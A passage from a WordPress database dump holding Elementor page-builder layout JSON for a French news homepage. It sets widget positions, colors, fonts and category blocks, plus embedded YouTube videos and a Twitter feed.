"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3086,924,'_elementor_version','0.4'),(3087,924,'_elementor_css','a:3:{s:4:\"time\";i:1511347598;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3090,925,'_elementor_edit_mode','builder'),(3091,925,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"